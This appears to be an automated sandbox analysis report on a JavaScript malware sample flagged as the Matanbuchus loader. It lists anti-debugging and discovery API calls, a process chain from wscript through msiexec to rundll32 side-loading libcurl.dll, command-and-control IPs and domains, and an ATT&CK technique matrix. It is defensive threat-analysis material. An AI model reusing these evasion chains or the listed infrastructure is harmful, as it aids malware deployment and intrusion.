                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71B260 mov ecx, dword ptr fs:[00000030h]6_2_7F71B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71B260 mov eax, dword ptr fs:[00000030h]6_2_7F71B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71B260 mov edx, dword ptr fs:[00000030h]6_2_7F71B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71B260 mov eax, dword ptr fs:[00000030h]6_2_7F71B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71B260 mov ecx, dword ptr fs:[00000030h]6_2_7F71B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6FE250 mov edx, dword ptr fs:[00000030h]6_2_7F6FE250
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F702A20 mov eax, dword ptr fs:[00000030h]6_2_7F702A20
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F747A0D mov eax, dword ptr fs:[00000030h]6_2_7F747A0D
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F42E4 mov edx, dword ptr fs:[00000030h]6_2_7F6F42E4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F42E4 mov ecx, dword ptr fs:[00000030h]6_2_7F6F42E4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F72D0 mov edx, dword ptr fs:[00000030h]6_2_7F6F72D0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F719A90 mov eax, dword ptr fs:[00000030h]6_2_7F719A90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F4280 mov edx, dword ptr fs:[00000030h]6_2_7F6F4280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F4280 mov ecx, dword ptr fs:[00000030h]6_2_7F6F4280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F4280 mov ecx, dword ptr fs:[00000030h]6_2_7F6F4280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F4280 mov ecx, dword ptr fs:[00000030h]6_2_7F6F4280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F4280 mov ecx, dword ptr fs:[00000030h]6_2_7F6F4280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F6F4280 mov edx, dword ptr fs:[00000030h]6_2_7F6F4280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71C170 mov eax, dword ptr fs:[00000030h]6_2_7F71C170
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov edx, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov ecx, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov eax, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov eax, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov eax, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov eax, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov eax, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov edx, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70C160 mov eax, dword ptr fs:[00000030h]6_2_7F70C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F7479DC mov eax, dword ptr fs:[00000030h]6_2_7F7479DC
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71E1C0 mov edx, dword ptr fs:[00000030h]6_2_7F71E1C0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F71E1B0 mov eax, dword ptr fs:[00000030h]6_2_7F71E1B0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F747998 mov eax, dword ptr fs:[00000030h]6_2_7F747998
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F728870 mov ecx, dword ptr fs:[00000030h]6_2_7F728870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F728870 mov edx, dword ptr fs:[00000030h]6_2_7F728870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F728870 mov eax, dword ptr fs:[00000030h]6_2_7F728870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F728870 mov ecx, dword ptr fs:[00000030h]6_2_7F728870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov ecx, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov ecx, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov eax, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov eax, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov eax, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov eax, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov eax, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov eax, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_7F70A800 mov eax, dword ptr fs:[00000030h]6_2_7F70A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC0D6C0 mov edx, dword ptr fs:[00000030h]11_2_7EC0D6C0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC25EC0 mov ecx, dword ptr fs:[00000030h]11_2_7EC25EC0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC06E80 mov eax, dword ptr fs:[00000030h]11_2_7EC06E80
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2E690 mov ecx, dword ptr fs:[00000030h]11_2_7EC2E690
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov eax, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov edx, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov eax, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov eax, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov eax, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov eax, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov eax, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov ecx, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov edx, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC21EB0 mov eax, dword ptr fs:[00000030h]11_2_7EC21EB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC27660 mov ecx, dword ptr fs:[00000030h]11_2_7EC27660
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC3F610 mov eax, dword ptr fs:[00000030h]11_2_7EC3F610
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC507C8 mov ecx, dword ptr fs:[00000030h]11_2_7EC507C8
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC047D4 mov ecx, dword ptr fs:[00000030h]11_2_7EC047D4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC047D4 mov ecx, dword ptr fs:[00000030h]11_2_7EC047D4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC047D4 mov edx, dword ptr fs:[00000030h]11_2_7EC047D4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2AF60 mov eax, dword ptr fs:[00000030h]11_2_7EC2AF60
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC06F1A mov eax, dword ptr fs:[00000030h]11_2_7EC06F1A
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC08F30 mov edx, dword ptr fs:[00000030h]11_2_7EC08F30
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC08F30 mov ecx, dword ptr fs:[00000030h]11_2_7EC08F30
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC08F30 mov ecx, dword ptr fs:[00000030h]11_2_7EC08F30
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC15CD0 mov ecx, dword ptr fs:[00000030h]11_2_7EC15CD0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC06C70 mov edx, dword ptr fs:[00000030h]11_2_7EC06C70
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC12420 mov edx, dword ptr fs:[00000030h]11_2_7EC12420
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC12420 mov eax, dword ptr fs:[00000030h]11_2_7EC12420
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC37D90 mov ecx, dword ptr fs:[00000030h]11_2_7EC37D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC37D90 mov edx, dword ptr fs:[00000030h]11_2_7EC37D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC37D90 mov eax, dword ptr fs:[00000030h]11_2_7EC37D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC37D90 mov ecx, dword ptr fs:[00000030h]11_2_7EC37D90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC0E5A0 mov eax, dword ptr fs:[00000030h]11_2_7EC0E5A0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2ADB0 mov edx, dword ptr fs:[00000030h]11_2_7EC2ADB0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2A560 mov ecx, dword ptr fs:[00000030h]11_2_7EC2A560
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2A560 mov eax, dword ptr fs:[00000030h]11_2_7EC2A560
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2A560 mov ecx, dword ptr fs:[00000030h]11_2_7EC2A560
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC072D0 mov edx, dword ptr fs:[00000030h]11_2_7EC072D0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC042E4 mov edx, dword ptr fs:[00000030h]11_2_7EC042E4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC042E4 mov ecx, dword ptr fs:[00000030h]11_2_7EC042E4
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC04280 mov edx, dword ptr fs:[00000030h]11_2_7EC04280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC04280 mov ecx, dword ptr fs:[00000030h]11_2_7EC04280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC04280 mov ecx, dword ptr fs:[00000030h]11_2_7EC04280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC04280 mov ecx, dword ptr fs:[00000030h]11_2_7EC04280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC04280 mov ecx, dword ptr fs:[00000030h]11_2_7EC04280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC04280 mov edx, dword ptr fs:[00000030h]11_2_7EC04280
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC29A90 mov eax, dword ptr fs:[00000030h]11_2_7EC29A90
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC0E250 mov edx, dword ptr fs:[00000030h]11_2_7EC0E250
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2B260 mov ecx, dword ptr fs:[00000030h]11_2_7EC2B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2B260 mov eax, dword ptr fs:[00000030h]11_2_7EC2B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2B260 mov edx, dword ptr fs:[00000030h]11_2_7EC2B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2B260 mov eax, dword ptr fs:[00000030h]11_2_7EC2B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2B260 mov ecx, dword ptr fs:[00000030h]11_2_7EC2B260
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC57A0D mov eax, dword ptr fs:[00000030h]11_2_7EC57A0D
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC0DA10 mov edx, dword ptr fs:[00000030h]11_2_7EC0DA10
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC0DA10 mov eax, dword ptr fs:[00000030h]11_2_7EC0DA10
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC12A20 mov eax, dword ptr fs:[00000030h]11_2_7EC12A20
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2D3E0 mov ecx, dword ptr fs:[00000030h]11_2_7EC2D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2D3E0 mov eax, dword ptr fs:[00000030h]11_2_7EC2D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2D3E0 mov ecx, dword ptr fs:[00000030h]11_2_7EC2D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2D3E0 mov edx, dword ptr fs:[00000030h]11_2_7EC2D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2D3E0 mov eax, dword ptr fs:[00000030h]11_2_7EC2D3E0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2E3A0 mov eax, dword ptr fs:[00000030h]11_2_7EC2E3A0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC0D370 mov edx, dword ptr fs:[00000030h]11_2_7EC0D370
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC38870 mov ecx, dword ptr fs:[00000030h]11_2_7EC38870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC38870 mov edx, dword ptr fs:[00000030h]11_2_7EC38870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC38870 mov eax, dword ptr fs:[00000030h]11_2_7EC38870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC38870 mov ecx, dword ptr fs:[00000030h]11_2_7EC38870
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov ecx, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov ecx, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov eax, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov eax, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov eax, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov eax, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov eax, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov eax, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1A800 mov eax, dword ptr fs:[00000030h]11_2_7EC1A800
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2E1C0 mov edx, dword ptr fs:[00000030h]11_2_7EC2E1C0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC579DC mov eax, dword ptr fs:[00000030h]11_2_7EC579DC
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC57998 mov eax, dword ptr fs:[00000030h]11_2_7EC57998
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2E1B0 mov eax, dword ptr fs:[00000030h]11_2_7EC2E1B0
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov edx, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov ecx, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov eax, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov eax, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov eax, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov eax, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov eax, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov edx, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC1C160 mov eax, dword ptr fs:[00000030h]11_2_7EC1C160
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_7EC2C170 mov eax, dword ptr fs:[00000030h]11_2_7EC2C170
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_7F2D95F0 GetProcessHeap,GetDriveTypeA,4_2_7F2D95F0
                  Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\rundll32.exe C:/Windows/System32/rundll32.exe libcurl.dll, curl_easy_init
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_6C35F233 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_6C35F233
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_7F2F1665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_7F2F1665
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_7F2F1417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_7F2F1417
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_7F2F52A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_7F2F52A3
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6B63F233 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6B63F233
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7F731665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_7F731665
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7F731417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_7F731417
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_7F7352A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_7F7352A3
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_7EC41665 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_7EC41665
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_7EC41417 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_7EC41417
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_7EC452A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_7EC452A3

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 185.234.216.175 443
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_7F2F11CC cpuid 4_2_7F2F11CC
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,4_2_7F303E2F
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_7F30AC51
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,4_2_7F30AB82
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_7F30AA7C
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,4_2_7F30A953
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_7F30A700
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,4_2_7F30A675
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,4_2_7F30A58F
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW,4_2_7F30A5DA
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,4_2_7F30A4E8
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,4_2_7F3043AE
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW,4_2_7F30A2ED
                  Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_7F2F1534 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_7F2F1534
                  Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 6_2_6B6351C0 DllInstall,GetTempFileNameW,GetFileType,GetSystemDirectoryA,LoadLibraryA,GetUserNameA,lstrlenA,lstrlenA,6_2_6B6351C0
                  Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Windows\SysWOW64\msiexec.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Windows\SysWOW64\msiexec.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information2
                  Scripting
                  1
                  Replication Through Removable Media
                  21
                  Windows Management Instrumentation
                  2
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  2
                  Ingress Tool Transfer
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Native API
                  1
                  DLL Side-Loading
                  11
                  Process Injection
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory11
                  Peripheral Device Discovery
                  Remote Desktop ProtocolData from Removable Media11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)3
                  Obfuscated Files or Information
                  Security Account Manager1
                  Account Discovery
                  SMB/Windows Admin SharesData from Network Shared Drive11
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading
                  NTDS36
                  System Information Discovery
                  Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  File Deletion
                  LSA Secrets41
                  Security Software Discovery
                  SSHKeylogging4
                  Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                  Masquerading
                  Cached Domain Credentials1
                  Process Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                  Virtualization/Sandbox Evasion
                  DCSync21
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                  Process Injection
                  Proc Filesystem1
                  System Owner/User Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Rundll32
                  /etc/passwd and /etc/shadow1
                  System Network Configuration Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1570376 Sample: Doc_21-04-53.js Startdate: 06/12/2024 Architecture: WINDOWS Score: 96 47 security-patches.systems 2->47 49 axizlhop.life 2->49 59 Suricata IDS alerts for network traffic 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 Yara detected Matanbuchus 2->63 65 3 other signatures 2->65 8 msiexec.exe 15 38 2->8         started        12 regsvr32.exe 2->12         started        14 wscript.exe 1 2->14         started        17 2 other processes 2->17 signatures3 process4 dnsIp5 51 axizlhop.life 104.21.40.3, 443, 49730 CLOUDFLARENETUS United States 8->51 37 C:\Users\user\AppData\Roaming\...\libcurl.dll, PE32 8->37 dropped 39 C:\Windows\Installer\MSI68B0.tmp, PE32 8->39 dropped 41 C:\Windows\Installer\MSI6890.tmp, PE32 8->41 dropped 43 2 other files (none is malicious) 8->43 dropped 19 rundll32.exe 8->19         started        21 msiexec.exe 8->21         started        23 regsvr32.exe 8 12->23         started        69 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->69 26 regsvr32.exe 10 17->26         started        28 regsvr32.exe 10 17->28         started        file6 signatures7 process8 signatures9 30 rundll32.exe 2 18 19->30         started        35 conhost.exe 21->35         started        67 System process connects to network (likely due to code injection or exploit) 23->67 process10 dnsIp11 53 security-patches.systems 185.234.216.175, 443, 4443, 49731 SPRINT-SDCPL Poland 30->53 45 C:\Users\user\8f08\813848\813848.winmd, PE32 30->45 dropped 55 Found evasive API chain (may stop execution after checking mutex) 30->55 57 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 30->57 file12 signatures13

                  Source | Detection | Scanner | Label | Link
                  Doc_21-04-53.js | 0% | ReversingLabs | |

                  Source | Detection | Scanner | Label | Link
                  C:\Users\user\8f08\813848\813848.winmd | 5% | ReversingLabs | |
                  C:\Users\user\AppData\Roaming\silver\libcurl.dll | 5% | ReversingLabs | |
                  C:\Windows\Installer\MSI67E2.tmp | 0% | ReversingLabs | |
                  C:\Windows\Installer\MSI6850.tmp | 0% | ReversingLabs | |
